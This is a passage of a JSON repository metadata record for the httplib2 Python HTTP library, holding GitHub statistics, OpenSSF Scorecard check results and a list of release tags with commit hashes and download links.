community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed